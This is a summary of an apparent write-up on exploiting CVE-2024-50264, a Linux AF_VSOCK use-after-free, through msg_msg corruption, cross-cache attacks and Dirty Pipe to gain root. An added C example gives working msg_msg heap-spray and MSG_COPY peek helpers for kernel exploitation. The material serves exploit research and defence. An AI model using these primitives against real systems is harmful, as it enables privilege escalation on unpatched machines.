Kernel-hack-drill and exploiting CVE-2024-50264 in the Linux kernel
7 days ago
- #Exploit Development
- #CVE-2024-50264
- #Linux Kernel
- CVE-2024-50264 is a race condition in AF_VSOCK sockets in the Linux kernel, leading to a use-after-free (UAF) vulnerability.
- The vulnerability was introduced in Linux v4.8 and allows an unprivileged user to trigger the bug without user namespaces.
- Exploiting CVE-2024-50264 is challenging due to multiple limitations, including an unstable race and UAF writes that land very soon after the free, leaving little time to reclaim the freed object.
- The article introduces kernel-hack-drill, a project for testing Linux kernel exploit primitives, which helped in developing the exploit.
- A novel technique for corrupting msg_msg objects is presented, turning the corruption into an out-of-bounds kernel memory read that does not require a prior infoleak.
- The exploit strategy involves cross-cache attacks, Dirty Pipe techniques, and overcoming physical KASLR to achieve privilege escalation.
- The final exploit combines UAF writes with pipe_buffer manipulation to overwrite process credentials and gain root access.
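As an added illustration of the msg_msg primitive the post builds on (this is not code from the post or from kernel-hack-drill, and it sketches no step of the CVE-2024-50264 exploit): user-space helpers that pick msgsnd() payload sizes so the resulting struct msg_msg lands in a chosen kmalloc cache, spray a queue, and peek at a message with MSG_COPY. The header sizes, 4 KiB page size and kmalloc size classes below are assumptions for x86_64 Linux; the kernel copies m_ts bytes out of the object on msgrcv(), which is why a corrupted m_ts becomes an out-of-bounds read.

```c
/* Added example, not from the original post: msg_msg sizing and spraying
 * helpers. Constants assume x86_64 Linux with 4 KiB pages and the struct
 * layouts from ipc/msgutil.c (struct msg_msg header = 48 bytes,
 * struct msg_msgseg header = 8 bytes). */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>

#define PAGE_SZ        4096UL
#define MSG_MSG_HDR    48UL   /* list_head + m_type + m_ts + next + security */
#define MSG_MSGSEG_HDR 8UL    /* next pointer only */
#define DATALEN_MSG    (PAGE_SZ - MSG_MSG_HDR)    /* 4048: inline data in first chunk */
#define DATALEN_SEG    (PAGE_SZ - MSG_MSGSEG_HDR) /* 4088: data per msg_msgseg */

/* kmalloc request size of the first chunk (header + inline data) for a
 * msgsnd() of datalen bytes. Data past DATALEN_MSG goes to msg_msgseg chunks. */
size_t msg_msg_alloc_size(size_t datalen) {
    size_t inline_len = datalen < DATALEN_MSG ? datalen : DATALEN_MSG;
    return MSG_MSG_HDR + inline_len;
}

/* Number of msg_msgseg allocations needed for datalen bytes. */
size_t msg_msg_seg_count(size_t datalen) {
    if (datalen <= DATALEN_MSG)
        return 0;
    size_t rest = datalen - DATALEN_MSG;
    return (rest + DATALEN_SEG - 1) / DATALEN_SEG;
}

/* Generic kmalloc size class for a request (assumed classes: 8, 16, 32, 64,
 * 96, 128, 192, then powers of two). Note that msg_msg is allocated with
 * GFP_KERNEL_ACCOUNT, so on memcg kernels it lives in kmalloc-cg-N. */
size_t kmalloc_bucket(size_t size) {
    static const size_t small[] = { 8, 16, 32, 64, 96, 128, 192 };
    for (size_t i = 0; i < sizeof small / sizeof small[0]; i++)
        if (size <= small[i])
            return small[i];
    size_t b = 256;
    while (b < size)
        b <<= 1;
    return b;
}

/* Largest msgsnd() datalen whose first chunk fills the given cache exactly.
 * Caches below 64 cannot hold the 48-byte header; above 4096 the first
 * chunk never grows past one page, so 0 means "not reachable". */
size_t datalen_for_bucket(size_t bucket) {
    if (bucket < 64 || bucket > PAGE_SZ)
        return 0;
    return bucket - MSG_MSG_HDR;
}

struct spray_msg {
    long mtype;
    char mtext[DATALEN_MSG];
};

/* Send count messages of datalen bytes filled with `fill`; returns how many
 * were queued (stops early on EAGAIN/ENOMEM when the queue limit is hit). */
int msg_spray(int qid, size_t datalen, int count, unsigned char fill) {
    struct spray_msg m;
    memset(&m, 0, sizeof m);
    m.mtype = 1;
    memset(m.mtext, fill, datalen);
    int sent = 0;
    for (int i = 0; i < count; i++) {
        if (msgsnd(qid, &m, datalen, IPC_NOWAIT) < 0)
            break;
        sent++;
    }
    return sent;
}

/* Copy message number idx out of the queue without dequeueing it. MSG_COPY
 * needs CONFIG_CHECKPOINT_RESTORE; the kernel copies m_ts bytes (truncated
 * to bufsz because of MSG_NOERROR), so this is the read side an exploit
 * would use once m_ts has been corrupted. */
ssize_t msg_peek(int qid, long idx, struct spray_msg *buf, size_t bufsz) {
    return msgrcv(qid, buf, bufsz, idx, MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

int main(void) {
    size_t target = 1024; /* assumed target cache: kmalloc(-cg)-1024 */
    size_t datalen = datalen_for_bucket(target);
    printf("datalen %zu -> first chunk %zu bytes -> kmalloc-%zu\n",
           datalen, msg_msg_alloc_size(datalen), kmalloc_bucket(msg_msg_alloc_size(datalen)));

    int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0600);
    if (qid < 0) { perror("msgget"); return 1; }
    int sent = msg_spray(qid, datalen, 64, 0x41);
    struct spray_msg peek;
    ssize_t got = msg_peek(qid, 0, &peek, sizeof peek.mtext);
    printf("sprayed %d msg_msg objects, peeked %zd bytes of message 0\n", sent, got);
    msgctl(qid, IPC_RMID, NULL);
    return 0;
}
```

Run it unprivileged; if msgrcv() fails with ENOSYS the kernel lacks MSG_COPY support, and a small `sent` usually means the per-queue byte limit (/proc/sys/kernel/msgmnb) was reached, which is why real sprays spread messages across many queues.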